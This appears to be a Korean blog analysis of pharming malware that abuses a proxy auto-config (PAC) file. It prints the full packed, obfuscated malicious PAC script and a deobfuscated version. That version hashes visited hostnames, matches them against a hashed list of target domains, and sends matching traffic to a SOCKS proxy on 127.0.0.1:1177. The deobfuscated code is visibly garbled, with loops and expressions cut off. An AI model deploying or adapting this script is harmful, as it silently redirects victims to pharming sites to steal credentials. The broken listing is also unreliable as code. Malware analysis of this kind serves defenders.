[파밍] PAC를 이용한 악성코드

PAC(프록시 자동 구성) 파일은 인터넷 또는 인트라넷에 대한 사용자 액세스를 제어하는 방법입니다. PAC 파일은 웹 브라우저가 요청된 콘텐츠를 검색하기 위해 ProxySG 어플라이언스를 사용해야 하는 시기와 사용 여부에 대한 지침을 포함하며, .pac 확장자가 있는 JavaScript 스크립트 파일입니다. 네트워크 관리자는 PAC 파일이 중앙에서 관리되며 업데이트가 쉽기 때문에 PAC 파일 사용을 즐겨합니다.

네트워크 상의 웹 서버에 이미 PAC 파일이 있는 경우 네트워크 상의 모든 클라이언트에 대한 이 파일의 URL을 웹 브라우저 구성에 추가합니다. PAC 파일 위치를 정의하면 웹 브라우저가 웹 요청 처리에 대한 프록시 구성 지침을 검색 및 다운로드할 수 있습니다.

  - 출처 : https://bto.bluecoat.com/webguides/proxysg/6.4/authentication_webguideko/Content/Topics/Authentication/Tasks/Browser/set_up_a_PAC_file_ta.htm

PAC 파일 내용

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('7 X=0;7 10="";7 h=8;g J(s){f P(r(A(s),s.l*h))}g 1w(s){f R(r(A(s),s.l*h))}g 1A(s){f O(r(A(s),s.l*h))}g 1y(p,o){f P(E(p,o))}g 1o(p,o){f R(E(p,o))}g 1p(p,o){f O(E(p,o))}g r(x,C){x[C>>5]|=1q<<(24-C%32);x[((C+1t>>9)<<4)+15]=C;7 w=B(1d);7 a=1s;7 b=-1M;7 c=-1N;7 d=1Q;7 e=-1O;q(7 i=0;i<x.l;i+=16){7 1h=a;7 19=b;7 18=c;7 1a=d;7 1c=e;q(7 j=0;j<1d;j++){u(j<16)w[j]=x[i+j];U w[j]=F(w[j-3]^w[j-8]^w[j-14]^w[j-16],1);7 t=m(m(F(a,5),1i(j,b,c,d)),m(m(e,w[j]),1m(j)));e=d;d=c;c=F(b,30);b=a;a=t}a=m(a,1h);b=m(b,19);c=m(c,18);d=m(d,1a);e=m(e,1c)}f B(a,b,c,d,e)}g 1g(s){f J(J(s)+\'1E\')}g 1i(t,b,c,d){u(t<20)f(b&c)|((~b)&d);u(t<1n)f b^c^d;u(t<1k)f(b&c)|(b&d)|(c&d);f b^c^d}g 1m(t){f(t<20)?1B:(t<1n)?1H:(t<1k)?-1I:-1F}g E(p,o){7 z=A(p);u(z.l>16)z=r(z,p.l*h);7 L=B(16),N=B(16);q(7 i=0;i<16;i++){L[i]=z[i]^1G;N[i]=z[i]^1R}7 13=r(L.12(A(o)),V+o.l*h);f r(N.12(13),V+1C)}g m(x,y){7 H=(x&G)+(y&G);7 Z=(x>>16)+(y>>16)+(H>>16);f(Z<<16)|(H&G)}g F(I,S){f(I<<S)|(I>>>(32-S))}g A(k){7 v=B();7 D=(1<<h)-1;q(7 i=0;i<k.l*h;i+=h)v[i>>5]|=(k.1D(i/h)&D)<<(32-h-i%32);f v}g O(v){7 k="";7 D=(1<<h)-1;q(7 i=0;i<v.l*32;i+=h)k+=1J.1P((v[i>>5]>>>(32-h-i%32))&D);f k}g P(n){7 Q=X?"1L":"1K";7 k="";q(7 i=0;i<n.l*4;i++){k+=Q.K((n[i>>2]>>((3-i%4)*8+4))&11)+Q.K((n[i>>2]>>((3-i%4)*8))&11)}f k}g R(n){7 W="1r+/";7 k="";q(7 i=0;i<n.l*4;i+=3){7 Y=(((n[i>>2]>>8*(3-i%4))&T)<<16)|(((n[i+1>>2]>>8*(3-(i+1)%4))&T)<<8)|((n[i+2>>2]>>8*(3-(i+2)%4))&T);q(7 j=0;j<4;j++){u(i*8+j*6>n.l*32)k+=10;U k+=W.K((Y>>6*(3-j))&1v)}}f k}7 1f={"1u":1,"1x":1,"1z":1,"33":1,"3a":1,"2D":1,"2C":1,"2F":1,"2Q":1,"2P":1,"2S":1,"2L":1,"2N":1,"2O":1,"2M":1,"2R":1,"2K":1,"2E":1,"2I":1,"2J":1,"2G":1,"2H":1,"2T":1,"36":1,"37":1,"34":1,"35":1,"3b":1,"38":1,"39":1,"2X":1,"2Y":1,"2W":1,"2Z":1,"31":1,"2V":1,"2U":1,"2B":1,"28":1,"29":1,"27":1,"25":1,"1l":1,"1e":1,"26":1,"2d":1,"2e":1,"2c":1,"2a":1,"2b":1,"23":1,"1V":1,"1W":1,"1U":1,"1S":1,"1T":1,"21":1,"22":1,"1Z":1,"1X":1,"1Y":1,"2f":1,"2u":1,"2v":1,"2t":1,"2r":1,"2s":1,"2z":1,"2A":1,"2y":1,"2w":1,"2x":1,"2q":1,"2j":1,"1l":1,"2k":1,"1e":1};7 1j="2i 2g.0.0.1:2h";7 17=\'2o;\';7 M=2p.M;g 2n(2l,1b){u(M.2m(1f,1g(1b))){f 1j}f 17}',62,198,'|||||||var||||||||return|function|chrsz|||str|length|safe_add|binarray|data|key|for|core_lwo|||if|bin||||bkey|str2binb|Array|len|mask|core_hmac_lwo|rol|0xFFFF|lsw|num|iil_lwo|charAt|ipad|hasOwnProperty|opad|binb2str|binb2iil|iil_tab|binb2b64|cnt|0xFF|else|512|tab|iilcase|triplet|msw|b64pad|0xF|concat|hash||||ekls|oldc|oldb|oldd|woal|olde|80|83f6975e027788645b4c00ef25b5146fed5565cc|dowla|i11_lwo|olda|lwo_ft|po|60|4607d2c35e6d42a625c7c257e830326fc62bbeec|lwo_kt|40|b64_hmac_lwo|str_hmac_lwo|0x80|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|1732584193|64|ea7921b63846854dd57dc9277e34528cce350fa9|0x3F|b64_lwo|6aab394dadb90fc44794cfe2d714353ed7a5a67b|iil_hmac_lwo|2680e7b2d5a8a5ea8226976fb4ae5a0ad4c850bc|str_lwo|1518500249|160|charCodeAt|666|899497514|0x36363636|1859775393|1894007588|String|0123456789abcdef|0123456789ABCDEF|271733879|1732584194|1009589776|fromCharCode|271733878|0x5C5C5C5C|eb3dfbb25f6dd9cbf0f8bcc3ae7fe9cc964ab3ac|a1e2039e224da695da6d6dc07a0f14932943d3bb|5632c05a94052c83d1ea4397f2c3a4fb0c893d78|060e7648d662c61309ced4d719b0c4576152e0cc|35c9d4425028a1e38c1432916325272d797e596c|8ca13f57362cabed97720663eeec034b5c08a563|90e8642d438675783fdcb7593ab6a77081cfc06d|622991a4c79f105b66dbd10cc0a6fed52e5573c4||8cfc181809a5617f770055febf322ca7336ff77a|41ebd4c955131afca0edaafd1f1e014b9fdfc08a|fc018a9fbaecd3ec83d3509d97211c908d96bd8f||9e2d1f20d59ad10525b2bfa16133b631235a5bce|cdc1682b4261dcedee3f61c5657d3a8dee887602|c67935d6691fd10eda8d3735457f94aa4f629f20|250fa0cc5a1c3ff8f87ad5d9843662e02ab87990|62c116033e335ca54eb1b91ec34ff8a7b0cc9130|cce84205242461e6cd8abfaf1adc91061eaa7745|a0ebe30141ebdfea55f06e7add9b1ffa5618d64a|93cd406ba7d35f7eda092a400f31bacd740d2953|943823bad8f9493912f1507b1102ddda8724c35e|cb6907b8735fad92a23328dfd1514a7678dd6d13|97ad578240d2775fc8bbed8a70d5014c2f654928|127|1177|SOCKS|a4fc7941e529eb9343317114033db7920daa571d|9960106a906fa9d49a8e77d2b98d91bcef3431c2|wkql|call|FindProxyForURL|DIRECT|Object|4ad6b1518d006a84317d0054ee3116d03ad824af|28efc704a3bb7b53309948b2986e80c1fecf8cd8|fdc93ff8035c20656262b4b061e9bbf320b46877|14fc47bdf41c0bfc4779731bf2377faff9a09579|f314482664afb023f55e5d948774635262d56db4|b8363cd02ee0d3592f4872d801740064bfd0f7c0|668288564781df3fab4d9a583664fa03b3e3553f|8aaf0a929a9ad04e43c683d1c0a34d21975f2e41|35f0543871bad332dd6db720ef4b23adebbd6ed8|cc57de159b4eb59a6cc2fdb6c01a25a93b2a5afa|2edace762f11f327490aa8f54100140bd6d4b1ba|2bff03165710de5a6257cae93f74cff63285228c|508574b72ac28ea9347913efca53da381c771976|5c6e13a24f5924ea94fc925c2a0b79e58cfcf6f7|7a81f7225a07a69cd5cd6d0d25b7c15be7df3a32|8309cba1fd1a04db8fdcfd448f5125f8feb81a7e|f79535944be8a5bc06c550fb9202d6b4949bca0d|f714be9fde26bafd920ff2e0371ec34822c6dd8a|c9af90cb6a002bc09e639b457fe1b7a233b8c478|4483a10b6e4689c5b6ff0e1c1d06af58ecb36e28|43d57158cdc613bc6924bfd33d93c1624a5151c6|52a59637b3b68118d736131855e9a0faafce3ca9|463c43b8bf3d105bd8b90f87a762a61b35f78975|cd84d7a39102ab785b01a0b61f60aa6c9b6fe6fe|c231c235325d44f91eb84234d9fcc2cb4ac0c92c|9f9c1e692cfb5eaf522dd0feeb307c677987d216|33859e317cf5b7d57ec77cbb82d8225e8080ae10|f5841e4dce904508cebfe600e27d37716ca8013c|dee9ca5e4b515c7be93873bfd8e4d20e67cd9cd8|21bd476019a74cea59ab61b5240ca9b9b7833af6|4e3a2aa7d8bfd826758df07d3e5d5de482ddd4f5|6099f666e7ea1fd15f8829eb68aaee53de5d0091|2efe868db374d7d4d044f369bab1392ed6cb12b9|52bec35d1a5c0ecd0af7c769a8a603304b469814|bbd39779cd1f0ec563c1d0548071bda66fb10aa7|595dc993cbebcf89e65dc5ea3cf159fca3523254||d34da09a9220b81a1432a27bf830112b792f265e||84ad28870cd9bea81a0ad2f08bece0ea14353069|b1484496f37a2376f8fdf2bb9b5c75c131032eb5|2efb211fd18dcbb380c357367fcbb14c5088c2a7|c9f5025cb48435b27b7bacef6fa5abb55767206d|c93594728bd0627b98331e7cc974dd2ce04d5a1a|ee394e88b6f93cf726d1ce9751d5e962cb465bf4|60c238f80fda6c2b363dceb48d015a0cadb26cc7|6c780b275734e4391562b3dfff5a7756633ba7a8|f742437e4725fcc0d2507ad80bb7e05ccff48fd6'.split('|'),0,{}))

복호화된 PAC파일 내용

var iilcase = 0;

var b64pad = "";

var chrsz = 8;

function iil_lwo(s) {

    return binb2iil(core_lwo(str2binb(s), s.length * chrsz))

}

function b64_lwo(s) {

    return binb2b64(core_lwo(str2binb(s), s.length * chrsz))

}

function str_lwo(s) {

    return binb2str(core_lwo(str2binb(s), s.length * chrsz))

}

function iil_hmac_lwo(key, data) {

    return binb2iil(core_hmac_lwo(key, data))

}

function b64_hmac_lwo(key, data) {

    return binb2b64(core_hmac_lwo(key, data))

}

function str_hmac_lwo(key, data) {

    return binb2str(core_hmac_lwo(key, data))

}

function core_lwo(x, len) {

    x[len >> 5] |= 0x80 << (24 - len % 32);

    x[((len + 64 >> 9) << 4) + 15] = len;

    var w = Array(80);

    var a = 1732584193;

    var b = -271733879;

    var c = -1732584194;

    var d = 271733878;

    var e = -1009589776;

    for (var i = 0; i16) bkey = core_lwo(bkey, key.length * chrsz);

    var ipad = Array(16),

        opad = Array(16);

    for (var i = 0; i < 16; i++) {

        ipad[i] = bkey[i] ^ 0x36363636;

        opad[i] = bkey[i] ^ 0x5C5C5C5C

    }

    var hash = core_lwo(ipad.concat(str2binb(data)), 512 + data.length * chrsz);

    return core_lwo(opad.concat(hash), 512 + 160)

}

function safe_add(x, y) {

    var lsw = (x & 0xFFFF) + (y & 0xFFFF);

    var msw = (x >> 16) + (y >> 16) + (lsw >> 16);

    return (msw << 16) | (lsw & 0xFFFF)

}

function rol(num, cnt) {

    return (num < >> (32 - cnt))

}

function str2binb(str) {

    var bin = Array();

    var mask = (1 < > 5] |= (str.charCodeAt(i / chrsz) & mask) << (32 - chrsz - i % 32);

    return bin

}

function binb2str(bin) {

    var str = "";

    var mask = (1 < > 5] >>> (32 - chrsz - i % 32)) & mask);

return str

}

function binb2iil(binarray) {

    var iil_tab = iilcase ? "0123456789ABCDEF" : "0123456789abcdef";

    var str = "";

    for (var i = 0; i > 2] >> ((3 - i % 4) * 8 + 4)) & 0xF) + iil_tab.charAt((binarray[i >> 2] >> ((3 - i % 4) * 8)) & 0xF)

}

return str

}

function binb2b64(binarray) {

    var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

    var str = "";

    for (var i = 0; i > 2] >> 8 * (3 - i % 4)) & 0xFF) << 16) | (((binarray[i + 1 >> 2] >> 8 * (3 - (i + 1) % 4)) & 0xFF) << 8) | ((binarray[i + 2 >> 2] >> 8 * (3 - (i + 2) % 4)) & 0xFF);

for (var j = 0; j < 4; j++) {

    if (i * 8 + j * 6 > binarray.length * 32) str += b64pad;

    else str += tab.charAt((triplet >> 6 * (3 - j)) & 0x3F)

}

}

return str

}

------ 암호화 된 파밍 도메인 ------

var dowla = {

    "ea7921b63846854dd57dc9277e34528cce350fa9": 1,

    "6aab394dadb90fc44794cfe2d714353ed7a5a67b": 1,

    "2680e7b2d5a8a5ea8226976fb4ae5a0ad4c850bc": 1,

    "84ad28870cd9bea81a0ad2f08bece0ea14353069": 1,

    "6c780b275734e4391562b3dfff5a7756633ba7a8": 1,

    "5c6e13a24f5924ea94fc925c2a0b79e58cfcf6f7": 1,

    "508574b72ac28ea9347913efca53da381c771976": 1,

    "8309cba1fd1a04db8fdcfd448f5125f8feb81a7e": 1,

    "33859e317cf5b7d57ec77cbb82d8225e8080ae10": 1,

    "9f9c1e692cfb5eaf522dd0feeb307c677987d216": 1,

    "dee9ca5e4b515c7be93873bfd8e4d20e67cd9cd8": 1,

    "52a59637b3b68118d736131855e9a0faafce3ca9": 1,

    "cd84d7a39102ab785b01a0b61f60aa6c9b6fe6fe": 1,

    "c231c235325d44f91eb84234d9fcc2cb4ac0c92c": 1,

    "463c43b8bf3d105bd8b90f87a762a61b35f78975": 1,

    "f5841e4dce904508cebfe600e27d37716ca8013c": 1,

    "43d57158cdc613bc6924bfd33d93c1624a5151c6": 1,

    "7a81f7225a07a69cd5cd6d0d25b7c15be7df3a32": 1,

    "c9af90cb6a002bc09e639b457fe1b7a233b8c478": 1,

    "4483a10b6e4689c5b6ff0e1c1d06af58ecb36e28": 1,

    "f79535944be8a5bc06c550fb9202d6b4949bca0d": 1,

    "f714be9fde26bafd920ff2e0371ec34822c6dd8a": 1,

    "21bd476019a74cea59ab61b5240ca9b9b7833af6": 1,

    "c9f5025cb48435b27b7bacef6fa5abb55767206d": 1,

    "c93594728bd0627b98331e7cc974dd2ce04d5a1a": 1,

    "b1484496f37a2376f8fdf2bb9b5c75c131032eb5": 1,

    "2efb211fd18dcbb380c357367fcbb14c5088c2a7": 1,

    "f742437e4725fcc0d2507ad80bb7e05ccff48fd6": 1,

    "ee394e88b6f93cf726d1ce9751d5e962cb465bf4": 1,

    "60c238f80fda6c2b363dceb48d015a0cadb26cc7": 1,

    "52bec35d1a5c0ecd0af7c769a8a603304b469814": 1,

    "bbd39779cd1f0ec563c1d0548071bda66fb10aa7": 1,

    "2efe868db374d7d4d044f369bab1392ed6cb12b9": 1,

    "595dc993cbebcf89e65dc5ea3cf159fca3523254": 1,

    "d34da09a9220b81a1432a27bf830112b792f265e": 1,

    "6099f666e7ea1fd15f8829eb68aaee53de5d0091": 1,

    "4e3a2aa7d8bfd826758df07d3e5d5de482ddd4f5": 1,

    "2bff03165710de5a6257cae93f74cff63285228c": 1,

    "250fa0cc5a1c3ff8f87ad5d9843662e02ab87990": 1,

    "62c116033e335ca54eb1b91ec34ff8a7b0cc9130": 1,

    "c67935d6691fd10eda8d3735457f94aa4f629f20": 1,

    "9e2d1f20d59ad10525b2bfa16133b631235a5bce": 1,

    "4607d2c35e6d42a625c7c257e830326fc62bbeec": 1,

    "83f6975e027788645b4c00ef25b5146fed5565cc": 1,

    "cdc1682b4261dcedee3f61c5657d3a8dee887602": 1,

    "943823bad8f9493912f1507b1102ddda8724c35e": 1,

    "cb6907b8735fad92a23328dfd1514a7678dd6d13": 1,

    "93cd406ba7d35f7eda092a400f31bacd740d2953": 1,

    "cce84205242461e6cd8abfaf1adc91061eaa7745": 1,

    "a0ebe30141ebdfea55f06e7add9b1ffa5618d64a": 1,

    "fc018a9fbaecd3ec83d3509d97211c908d96bd8f": 1,

    "060e7648d662c61309ced4d719b0c4576152e0cc": 1,

    "35c9d4425028a1e38c1432916325272d797e596c": 1,

    "5632c05a94052c83d1ea4397f2c3a4fb0c893d78": 1,

    "eb3dfbb25f6dd9cbf0f8bcc3ae7fe9cc964ab3ac": 1,

    "a1e2039e224da695da6d6dc07a0f14932943d3bb": 1,

    "8cfc181809a5617f770055febf322ca7336ff77a": 1,

    "41ebd4c955131afca0edaafd1f1e014b9fdfc08a": 1,

    "622991a4c79f105b66dbd10cc0a6fed52e5573c4": 1,

    "8ca13f57362cabed97720663eeec034b5c08a563": 1,

    "90e8642d438675783fdcb7593ab6a77081cfc06d": 1,

    "97ad578240d2775fc8bbed8a70d5014c2f654928": 1,

    "f314482664afb023f55e5d948774635262d56db4": 1,

    "b8363cd02ee0d3592f4872d801740064bfd0f7c0": 1,

    "14fc47bdf41c0bfc4779731bf2377faff9a09579": 1,

    "28efc704a3bb7b53309948b2986e80c1fecf8cd8": 1,

    "fdc93ff8035c20656262b4b061e9bbf320b46877": 1,

    "cc57de159b4eb59a6cc2fdb6c01a25a93b2a5afa": 1,

    "2edace762f11f327490aa8f54100140bd6d4b1ba": 1,

    "35f0543871bad332dd6db720ef4b23adebbd6ed8": 1,

    "668288564781df3fab4d9a583664fa03b3e3553f": 1,

    "8aaf0a929a9ad04e43c683d1c0a34d21975f2e41": 1,

    "4ad6b1518d006a84317d0054ee3116d03ad824af": 1,

    "a4fc7941e529eb9343317114033db7920daa571d": 1,

    "4607d2c35e6d42a625c7c257e830326fc62bbeec": 1,

    "9960106a906fa9d49a8e77d2b98d91bcef3431c2": 1,

    "83f6975e027788645b4c00ef25b5146fed5565cc": 1

};

var po = "SOCKS 127.0.0.1:1177";

var ekls = 'DIRECT;';

var hasOwnProperty = Object.hasOwnProperty;

------ 파밍 유도 함수 ---------

function FindProxyForURL(wkql, woal) {

    if (hasOwnProperty.call(dowla, i11_lwo(woal))) {

        return po

    }

    return ekls

}

암호화된 도메인에 해당 되는 도메인에 접속할경우 파밍사이트로 접속 되고, 이밖에 도메인은 DIRECT로 정상적인 사이트로 접속 된다.